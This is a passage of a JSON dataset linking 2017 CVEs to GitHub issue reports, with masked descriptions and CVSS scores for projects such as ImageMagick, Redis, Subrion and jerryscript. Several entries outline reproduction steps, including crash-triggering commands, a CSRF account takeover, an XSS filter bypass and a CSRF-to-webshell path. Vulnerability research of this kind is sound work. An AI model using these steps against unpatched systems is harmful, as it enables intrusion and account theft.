  9394. "description": "Security: NULL word of APITAG lead to heap memory corruption results in OOB write.. APITAG and Crash in release NUMBERTAG FILETAG is as follows(hex displayed): APITAG Among the first string, there is a ' NUMBERTAG a). This byte could be replaced by ' NUMBERTAG d) or other bytes. And this kind of bytes makes the generated byte code contains an NULL word NUMBERTAG which lead to a crash as the following stack trace shows: ERRORTAG Root cause When processing the strings, the generated byte code are as follows: CODETAG The NULL word in NUMBERTAG is one of the APITAG compressed pointer. When bytecode is executed, the reference of the literal add NUMBERTAG while APITAG was overwritten because of the compressed pointer. Twice as it was referenced so the field was added up to NUMBERTAG This makes the index of the free chunk lists corrupts. Potential Risks With the heap memory corruption the free chunk lists could be faked. Potentially there exists an local write primitive in memory. If jerry is embedded in some host and could execute js, this vulnerability could result in remote code execution. Fix Suggestion Check code in bytecode generation: the failed literal's compressed pointer should not be NULL word.",
  9395. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9396. "severity": "HIGH",
  9397. "baseScore": 7.8,
  9398. "impactScore": 5.9,
  9399. "exploitabilityScore": 1.8
  9400. },
  9401. {
  9402. "CVE_ID": "CVE-2017-14868",
  9403. "Issue_Url_old": "https://github.com/restlet/restlet-framework-java/issues/1286",
  9404. "Issue_Url_new": "https://github.com/restlet/restlet-framework-java/issues/1286",
  9405. "Repo_new": "restlet/restlet-framework-java",
  9406. "Issue_Created_At": "2017-09-27T14:33:06Z",
  9407. "description": "XXE security issue using the XML provider. As reported by one of our users: ERRORTAG",
  9408. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  9409. "severity": "HIGH",
  9410. "baseScore": 7.5,
  9411. "impactScore": 3.6,
  9412. "exploitabilityScore": 3.9
  9413. },
  9414. {
  9415. "CVE_ID": "CVE-2017-14957",
  9416. "Issue_Url_old": "https://github.com/BlogoText/blogotext/issues/318",
  9417. "Issue_Url_new": "https://github.com/blogotext/blogotext/issues/318",
  9418. "Repo_new": "blogotext/blogotext",
  9419. "Issue_Created_At": "2017-09-14T18:21:30Z",
  9420. "description": "Contact for security issue. Hi, I've found a serious security issue in APITAG NUMBERTAG MENTIONTAG How can I contact (email) you privately?",
  9421. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  9422. "severity": "MEDIUM",
  9423. "baseScore": 6.1,
  9424. "impactScore": 2.7,
  9425. "exploitabilityScore": 2.8
  9426. },
  9427. {
  9428. "CVE_ID": "CVE-2017-14981",
  9429. "Issue_Url_old": "https://github.com/atutor/ATutor/issues/135",
  9430. "Issue_Url_new": "https://github.com/atutor/atutor/issues/135",
  9431. "Repo_new": "atutor/atutor",
  9432. "Issue_Created_At": "2017-09-30T09:01:50Z",
  9433. "description": "APITAG Cross Site Scripting (XSS) . Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: APITAG of Venustech Advisory Details: Cross Site Scripting (XSS) were discovered APITAG NUMBERTAG which can be exploited to execute arbitrary JS code. The parameter \"url\" in the file PATHTAG is unsafe, we can bypass the XSS filter.An attacker could execute arbitrary JS code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: the poc is : url= APITAG . APITAG",
  9434. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  9435. "severity": "MEDIUM",
  9436. "baseScore": 5.4,
  9437. "impactScore": 2.7,
  9438. "exploitabilityScore": 2.3
  9439. },
  9440. {
  9441. "CVE_ID": "CVE-2017-14988",
  9442. "Issue_Url_old": "https://github.com/openexr/openexr/issues/248",
  9443. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/248",
  9444. "Repo_new": "academysoftwarefoundation/openexr",
  9445. "Issue_Created_At": "2017-09-27T02:45:31Z",
  9446. "description": "DOS bug while reading attributes in Header::readfrom. I use APITAG to convert exr image, and it report allocate memory failure. After took a look, APITAG calls APITAG to open exr file, this function only takes filename as argument, so I think it is a openexr bug. You can get the POC file from FILETAG and run : magick test.exr FILETAG ERRORTAG",
  9447. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9448. "severity": "MEDIUM",
  9449. "baseScore": 5.5,
  9450. "impactScore": 3.6,
  9451. "exploitabilityScore": 1.8
  9452. },
  9453. {
  9454. "CVE_ID": "CVE-2017-14989",
  9455. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/781",
  9456. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/781",
  9457. "Repo_new": "imagemagick/imagemagick",
  9458. "Issue_Created_At": "2017-09-25T10:57:05Z",
  9459. "description": "heap use after free in APITAG Version : APITAG NUMBERTAG Q NUMBERTAG FILETAG In order to reproduce this bug, need to build APITAG and Freetype2 with ASAN. Add a crafted font in PATHTAG ''' APITAG ''' The crafted font file : FILETAG After have added the crafted font, run : magick background lightblue fill blue font test size NUMBERTAG caption:hello world FILETAG ASAN would report NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG a0 at pc NUMBERTAG f NUMBERTAG ab1cc NUMBERTAG bp NUMBERTAG ffd NUMBERTAG c NUMBERTAG sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a0 thread T NUMBERTAG f NUMBERTAG ab1cc NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG d4c in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG aa NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5cad NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf NUMBERTAG ad9 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf8a1fc in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG e0 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abeb7ad7 in APITAG PATHTAG NUMBERTAG ee NUMBERTAG d in APITAG PATHTAG NUMBERTAG ee NUMBERTAG d in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG f NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a2d8 in _start ( PATHTAG NUMBERTAG a0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG c0c8b in __interceptor_free PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ad0 in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG aa NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ea NUMBERTAG in 
APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5cad NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf NUMBERTAG ad9 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf8a1fc in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG in APITAG PATHTAG previously allocated by thread T0 here NUMBERTAG c0fdc in __interceptor_malloc PATHTAG NUMBERTAG f NUMBERTAG ab NUMBERTAG e2 in ft_mem_qalloc PATHTAG NUMBERTAG f NUMBERTAG ab NUMBERTAG e2 in ft_mem_alloc PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG aa NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5cad NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf NUMBERTAG ad9 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf8a1fc in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG in APITAG PATHTAG ''' After I took a look at the code, I think it maybe caused by calling APITAG multiple times. First when ''' APITAG if (last_glyph.id NUMBERTAG APITAG last_glyph=glyph; APITAG } ''' last_glyph is equal to glyph. And then, in some cases, it will call APITAG and APITAG both. Since last_glyph = glyph, the last call will trigger this bug. ''' if (last_glyph.id NUMBERTAG APITAG / Determine font metrics. / APITAG APITAG APITAG if (ft_status NUMBERTAG APITAG } '''",
  9460. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9461. "severity": "MEDIUM",
  9462. "baseScore": 6.5,
  9463. "impactScore": 3.6,
  9464. "exploitabilityScore": 2.8
  9465. },
  9466. {
  9467. "CVE_ID": "CVE-2017-14992",
  9468. "Issue_Url_old": "https://github.com/moby/moby/issues/35075",
  9469. "Issue_Url_new": "https://github.com/moby/moby/issues/35075",
  9470. "Repo_new": "moby/moby",
  9471. "Issue_Created_At": "2017-10-03T21:29:36Z",
  9472. "description": "tar split does not read block by block nor validate tar format. Problem URLTAG This line can read any number of APITAG s at the end of an archive, potentially taking up all the space in RAM. Reproductible To reproduce, compress a high amount of NUMBERTAG s and push&pull as an image. Solution We should validate the integrity of tar headers and read block by block instead. Additional Comment MENTIONTAG also mentioned that URLTAG might be an issue if one can construct a very big tar header for a single entry. TBD /cc MENTIONTAG MENTIONTAG",
  9473. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  9474. "severity": "MEDIUM",
  9475. "baseScore": 6.5,
  9476. "impactScore": 3.6,
  9477. "exploitabilityScore": 2.8
  9478. },
  9479. {
  9480. "CVE_ID": "CVE-2017-15010",
  9481. "Issue_Url_old": "https://github.com/salesforce/tough-cookie/issues/92",
  9482. "Issue_Url_new": "https://github.com/salesforce/tough-cookie/issues/92",
  9483. "Repo_new": "salesforce/tough-cookie",
  9484. "Issue_Created_At": "2017-09-05T12:43:35Z",
  9485. "description": "Vulnerable Regular Expression. The following regular expression used for parsing the cookie is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. I noticed there is another bug report regarding the correctness of this regular expression. If needed, I can provide an actual example showing the slowdown.",
  9486. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9487. "severity": "HIGH",
  9488. "baseScore": 7.5,
  9489. "impactScore": 3.6,
  9490. "exploitabilityScore": 3.9
  9491. },
  9492. {
  9493. "CVE_ID": "CVE-2017-15015",
  9494. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/724",
  9495. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/724",
  9496. "Repo_new": "imagemagick/imagemagick",
  9497. "Issue_Created_At": "2017-09-03T15:05:49Z",
  9498. "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so ( messages)[length+offset] will dereference a NULL pointer and cause a memory error. Credit: APITAG of Venustech",
  9499. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9500. "severity": "HIGH",
  9501. "baseScore": 8.8,
  9502. "impactScore": 5.9,
  9503. "exploitabilityScore": 2.8
  9504. },
  9505. {
  9506. "CVE_ID": "CVE-2017-15016",
  9507. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/725",
  9508. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/725",
  9509. "Repo_new": "imagemagick/imagemagick",
  9510. "Issue_Created_At": "2017-09-03T15:06:02Z",
  9511. "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so ((PAPMHEADER) APITAG APITAG will dereference a NULL pointer and cause a memory error. Credit: APITAG of Venustech",
  9512. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9513. "severity": "HIGH",
  9514. "baseScore": 8.8,
  9515. "impactScore": 5.9,
  9516. "exploitabilityScore": 2.8
  9517. },
  9518. {
  9519. "CVE_ID": "CVE-2017-15017",
  9520. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/723",
  9521. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/723",
  9522. "Repo_new": "imagemagick/imagemagick",
  9523. "Issue_Created_At": "2017-09-03T15:05:37Z",
  9524. "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so mng_info >global_plte[i].xxx will dereference a NULL pointer and cause a memory error. Credit: APITAG of Venustech",
  9525. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9526. "severity": "HIGH",
  9527. "baseScore": 8.8,
  9528. "impactScore": 5.9,
  9529. "exploitabilityScore": 2.8
  9530. },
  9531. {
  9532. "CVE_ID": "CVE-2017-15041",
  9533. "Issue_Url_old": "https://github.com/golang/go/issues/22125",
  9534. "Issue_Url_new": "https://github.com/golang/go/issues/22125",
  9535. "Repo_new": "golang/go",
  9536. "Issue_Created_At": "2017-10-04T06:06:01Z",
  9537. "description": "placeholder for security issue. Placeholder for security release on October NUMBERTAG Go NUMBERTAG and Go NUMBERTAG",
  9538. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9539. "severity": "CRITICAL",
  9540. "baseScore": 9.8,
  9541. "impactScore": 5.9,
  9542. "exploitabilityScore": 3.9
  9543. },
  9544. {
  9545. "CVE_ID": "CVE-2017-15042",
  9546. "Issue_Url_old": "https://github.com/golang/go/issues/22134",
  9547. "Issue_Url_new": "https://github.com/golang/go/issues/22134",
  9548. "Repo_new": "golang/go",
  9549. "Issue_Created_At": "2017-10-04T17:36:00Z",
  9550. "description": "placeholder for security issue.",
  9551. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  9552. "severity": "MEDIUM",
  9553. "baseScore": 5.9,
  9554. "impactScore": 3.6,
  9555. "exploitabilityScore": 2.2
  9556. },
  9557. {
  9558. "CVE_ID": "CVE-2017-15047",
  9559. "Issue_Url_old": "https://github.com/antirez/redis/issues/4278",
  9560. "Issue_Url_new": "https://github.com/redis/redis/issues/4278",
  9561. "Repo_new": "redis/redis",
  9562. "Issue_Created_At": "2017-08-31T19:06:03Z",
  9563. "description": "Potential Buffer Overflow from user controllable Array Index value. The APITAG function within PATHTAG seems to allow for a Buffer Overflow vulnerability leading from an array index being set from user controllable input. The vulnerable code is: CODETAG As we can see, the _slot_ variable is receiving the output of atoi being run here: APITAG Now, _argv[j]_ is basically the arguments of each line (stored in APITAG being put into the array using _sdssplitargs_ for further processing. The slot value, after being extracted is then used in the _if else_ block which controls the slot migration, i.e. APITAG and APITAG . It is safe to assume that a user won't try to put in invalid slot numbers in the cluster configuration file. However, an attacker with limited access to the machine would be able to trigger memory corruption issues or even potentially execute code by forcing an Array Index out of Bounds exception from happening due to invalid values of _slot_. There should be some validation on the value of _slot_ and the maximum length of the _migrating_slots_to_ and _migrating_slots_from_ arrays.",
  9564. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9565. "severity": "CRITICAL",
  9566. "baseScore": 9.8,
  9567. "impactScore": 5.9,
  9568. "exploitabilityScore": 3.9
  9569. },
  9570. {
  9571. "CVE_ID": "CVE-2017-15056",
  9572. "Issue_Url_old": "https://github.com/upx/upx/issues/128",
  9573. "Issue_Url_new": "https://github.com/upx/upx/issues/128",
  9574. "Repo_new": "upx/upx",
  9575. "Issue_Created_At": "2017-10-02T06:31:37Z",
  9576. "description": "Invalid Pointer Read in APITAG An Invalid Pointer Read occurs in APITAG while decompressing a crafted binary. ASAN reports: ERRORTAG FILETAG",
  9577. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9578. "severity": "HIGH",
  9579. "baseScore": 7.8,
  9580. "impactScore": 5.9,
  9581. "exploitabilityScore": 1.8
  9582. },
  9583. {
  9584. "CVE_ID": "CVE-2017-15063",
  9585. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/547",
  9586. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/547",
  9587. "Repo_new": "intelliants/subrion",
  9588. "Issue_Created_At": "2017-10-01T07:56:36Z",
  9589. "description": "CSRF Token Bypass because of code logic error. There are CSRF vulnerabilities at Subrion CMS because of code logic APITAG the check function is set in the program, its location does not appear to be correct in FILETAG . APITAG APITAG should be executed first and then APITAG For example, we can use this vulnerability to get a APITAG create an HTML page which can simulate the function of the SQL tool. CODETAG When the administrator visits the page, even though it will echo APITAG treated as a potential CSRF APITAG SQL statement has been executed and the webshell has been created.",
  9590. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9591. "severity": "HIGH",
  9592. "baseScore": 8.8,
  9593. "impactScore": 5.9,
  9594. "exploitabilityScore": 2.8
  9595. },
  9596. {
  9597. "CVE_ID": "CVE-2017-15063",
  9598. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/570",
  9599. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/570",
  9600. "Repo_new": "intelliants/subrion",
  9601. "Issue_Created_At": "2017-10-15T03:58:59Z",
  9602. "description": "CSRF Account Take Over Possible. Affected Software Subrion Open Source CMS FILETAG URLTAG Version Tested NUMBERTAG Latest Stable version June NUMBERTAG URLTAG Environment Tested Ubuntu NUMBERTAG PHP NUMBERTAG ulnerability and Impact Vulnerability: Cross Site Request Forgery CSRF attack on profile upload Impact: Account Take Over The changing of password requires the knowledge of the current password, this prevents simplified account take over. It is still possible to perform an account take over through CSRF attack as it is possible to change the email of the user without knowing the current password. By changing the email, the attacker is able to perform an account reset :) Vulnerability Description: It is discovered that state changing requests, such as updating of profile: APITAG contains a parameter __st that holds a unique value to act as a CSRF prevention. However this value is not validated on the server side and thus it is possible to perform a CSRF attack. Steps to Reproduce: Craft a .html file that contains the CSRF attack POST request. Please change the PATHTAG to your own hosted IP address. The value of fullname does not matter. The important parameter here is email. Please note that for demonstration purpose, clicking on APITAG request\" is required. A real attack does not require a victim to click on any buttons, as it is possible to auto submit POST request when a page is loaded ERRORTAG NUMBERTAG Authenticate into Subrion CMS. Browse to your profile page NUMBERTAG On another tab, visit this crafted .html and click Submit Request NUMBERTAG Refresh your profile page and your email will be hijacked Refer to the screenshot attached. The entire __st is removed and the state changing request to update the profile still works. APITAG Recommendation: Validate the CSRF token Consider implementing changing of email to require the current password URLTAG",
  9603. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9604. "severity": "HIGH",
  9605. "baseScore": 8.8,
  9606. "impactScore": 5.9,
  9607. "exploitabilityScore": 2.8
  9608. },
  9609. {
  9610. "CVE_ID": "CVE-2017-15095",
  9611. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1737",
  9612. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1737",
  9613. "Repo_new": "fasterxml/jackson-databind",
  9614. "Issue_Created_At": "2017-08-17T21:24:26Z",
  9615. "description": "Block more JDK types from polymorphic deserialization. (note: follow up for NUMBERTAG After the initial set of types was blocked, new reports have arrived for more blacklisting. Although the eventual approach is likely to rely on a separate module (for more timely updates and wider version coverage), at this point an addition in databind is needed. I will update the specific list of additions once complete and the release is out. Target versions are APITAG and APITAG it is possible to backport in NUMBERTAG and even NUMBERTAG but there is diminishing return on effort with those versions so it will not happen unless specifically requested (I'm happy to merge PRs).",
  9616. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9617. "severity": "CRITICAL",
  9618. "baseScore": 9.8,
  9619. "impactScore": 5.9,
  9620. "exploitabilityScore": 3.9
  9621. },
  9622. {
  9623. "CVE_ID": "CVE-2017-15095",
  9624. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1680",
  9625. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1680",
  9626. "Repo_new": "fasterxml/jackson-databind",
  9627. "Issue_Created_At": "2017-06-27T04:56:59Z",
  9628. "description": "Blacklist couple more types for deserialization. (note: follow up on NUMBERTAG Looks like there is at least one other \"well known\" type to block besides NUMBERTAG already added (an impl class for database drivers). Will gather some more details; if appears credible, will add for NUMBERTAG",
  9629. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9630. "severity": "CRITICAL",
  9631. "baseScore": 9.8,
  9632. "impactScore": 5.9,
  9633. "exploitabilityScore": 3.9
  9634. },
  9635. {
  9636. "CVE_ID": "CVE-2017-15133",
  9637. "Issue_Url_old": "https://github.com/miekg/dns/issues/627",
  9638. "Issue_Url_new": "https://github.com/miekg/dns/issues/627",
  9639. "Repo_new": "miekg/dns",
  9640. "Issue_Created_At": "2018-01-17T11:17:11Z",
  9641. "description": "CVETAG . CVETAG",
  9642. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9643. "severity": "HIGH",
  9644. "baseScore": 7.5,
  9645. "impactScore": 3.6,
  9646. "exploitabilityScore": 3.9
  9647. },
  9648. {
  9649. "CVE_ID": "CVE-2017-15194",
  9650. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1010",
  9651. "Issue_Url_new": "https://github.com/cacti/cacti/issues/1010",
  9652. "Repo_new": "cacti/cacti",
  9653. "Issue_Created_At": "2017-10-04T13:36:16Z",
  9654. "description": "Path Based Cross Site Scripting (XSS). Running version NUMBERTAG Had a security scan performed on application and found NUMBERTAG instances of XSS: APITAG vulnerabilities occur when the Web application echoes user supplied data in an HTML response sent to the Web browser. For example, a Web application might include the user's name as part of a welcome message or display a home address when confirming a shipping destination. If the user supplied data contain characters that are interpreted as part of an HTML element instead of literal text, then an attacker can modify the HTML that is received by the victim's Web browser. The XSS payload is echoed in HTML document returned by the request. An XSS payload may consist of HTML, APITAG or other content that will be rendered by the browser. In order to exploit this vulnerability, a malicious user would need to trick a victim into visiting the URL with the XSS payload. In this case, the scanner identified the vulnerability by injecting a payload as part of the path component of the URL, as opposed to other kinds of XSS attacks that inject the payload into URL parameter values. APITAG exploits pose a significant threat to a Web application, its users and user data. XSS exploits target the users of a Web application rather than the Web application itself. An exploit can lead to theft of the user's credentials and personal or financial information. Complex exploits and attack scenarios are possible via XSS because it enables an attacker to execute dynamic code. Consequently, any capability or feature available to the Web browser (for example HTML, APITAG Flash and Java applets) can be used as a part of a compromise. APITAG all data collected from the client including user supplied content and browser content such as Referrer and User Agent headers. Any data collected from the client and displayed in a Web page should be HTML encoded to ensure the content is rendered as text instead of an HTML element or APITAG",
  9655. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  9656. "severity": "MEDIUM",
  9657. "baseScore": 6.1,
  9658. "impactScore": 2.7,
  9659. "exploitabilityScore": 2.8
  9660. },
  9661. {
  9662. "CVE_ID": "CVE-2017-15217",
  9663. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/759",
  9664. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/759",
  9665. "Repo_new": "imagemagick/imagemagick",
  9666. "Issue_Created_At": "2017-09-14T23:41:46Z",
  9667. "description": "memory leak in APITAG Here is the critical code ERRORTAG It can be solved by this: ERRORTAG Credit: APITAG of Venustech",
  9668. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9669. "severity": "MEDIUM",
  9670. "baseScore": 6.5,
  9671. "impactScore": 3.6,
  9672. "exploitabilityScore": 2.8
  9673. },
  9674. {
  9675. "CVE_ID": "CVE-2017-15218",
  9676. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/760",
  9677. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/760",
  9678. "Repo_new": "imagemagick/imagemagick",
  9679. "Issue_Created_At": "2017-09-15T05:55:48Z",
  9680. "description": "memory leak in APITAG Here is the critical code: ERRORTAG",
  9681. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9682. "severity": "MEDIUM",
  9683. "baseScore": 6.5,
  9684. "impactScore": 3.6,
  9685. "exploitabilityScore": 2.8
  9686. },
  9687. {
  9688. "CVE_ID": "CVE-2017-15232",
  9689. "Issue_Url_old": "https://github.com/mozilla/mozjpeg/issues/268",
  9690. "Issue_Url_new": "https://github.com/mozilla/mozjpeg/issues/268",
  9691. "Repo_new": "mozilla/mozjpeg",
  9692. "Issue_Created_At": "2017-09-30T02:36:55Z",
  9693. "description": "NULL Pointer Dereference vulnerability in quantize_ord_dither function of mozjpeg. Command and argument djpeg crop NUMBERTAG onepass dither ordered dct float colors NUMBERTAG targa grayscale outfile o FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
  9694. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9695. "severity": "MEDIUM",
  9696. "baseScore": 6.5,
  9697. "impactScore": 3.6,
  9698. "exploitabilityScore": 2.8
  9699. },
  9700. {
  9701. "CVE_ID": "CVE-2017-15277",
  9702. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/592",
  9703. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/592",
  9704. "Repo_new": "imagemagick/imagemagick",
  9705. "Issue_Created_At": "2017-07-21T04:34:43Z",
  9706. "description": "uninitialized image palette in coders/gif.c. Gif coder leaves the palette uninitialized if neither global nor local palette is present in a gif file. If APITAG is used as a library loaded into a process that operates on interesting data, this can cause security consequences. Repro is available at FILETAG ERRORTAG",
  9707. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  9708. "severity": "MEDIUM",
  9709. "baseScore": 6.5,
  9710. "impactScore": 3.6,
  9711. "exploitabilityScore": 2.8
  9712. },
  9713. {
  9714. "CVE_ID": "CVE-2017-15281",
  9715. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/832",
  9716. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/832",
  9717. "Repo_new": "imagemagick/imagemagick",
  9718. "Issue_Created_At": "2017-10-09T14:26:17Z",
  9719. "description": "Conditional Statement depends on uninitialized value. Version NUMBERTAG Running APITAG on a malformed input file results in a jump based on a non-initialized variable. The hexdump of the input file is: APITAG The relevant Memory Check output is: ERRORTAG The input file triggering the issue is attached: FILETAG",
  9720. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9721. "severity": "HIGH",
  9722. "baseScore": 8.8,
  9723. "impactScore": 5.9,
  9724. "exploitabilityScore": 2.8
  9725. },
  9726. {
  9727. "CVE_ID": "CVE-2017-15364",
  9728. "Issue_Url_old": "https://github.com/evan/ccsv/issues/15",
  9729. "Issue_Url_new": "https://github.com/evan/ccsv/issues/15",
  9730. "Repo_new": "evan/ccsv",
  9731. "Issue_Created_At": "2017-10-12T22:38:57Z",
  9732. "description": "Double free security issue. When attempting to parse a file with the following bytes, a double free occurs. APITAG Tested on ubuntu, with APITAG . gdb debug: CODETAG gdb output: ERRORTAG",
  9733. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9734. "severity": "MEDIUM",
  9735. "baseScore": 5.5,
  9736. "impactScore": 3.6,
  9737. "exploitabilityScore": 1.8
  9738. },
  9739. {
  9740. "CVE_ID": "CVE-2017-15368",
  9741. "Issue_Url_old": "https://github.com/radare/radare2/issues/8673",
  9742. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8673",
  9743. "Repo_new": "radareorg/radare2",
  9744. "Issue_Created_At": "2017-10-11T08:21:07Z",
  9745. "description": "Stack buffer overflow in APITAG Stack buffer overflow in APITAG Git HEAD: APITAG Faulting file in URLTAG Command: APITAG Valgrind log: ERRORTAG",
  9746. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9747. "severity": "HIGH",
  9748. "baseScore": 7.8,
  9749. "impactScore": 5.9,
  9750. "exploitabilityScore": 1.8
  9751. },
  9752. {
  9753. "CVE_ID": "CVE-2017-15385",
  9754. "Issue_Url_old": "https://github.com/radare/radare2/issues/8685",
  9755. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8685",
  9756. "Repo_new": "radareorg/radare2",
  9757. "Issue_Created_At": "2017-10-13T19:14:49Z",
  9758. "description": "Invalid write in APITAG Invalid write in APITAG Git HEAD: APITAG Faulting file in URLTAG Command: APITAG ASAN: ERRORTAG",
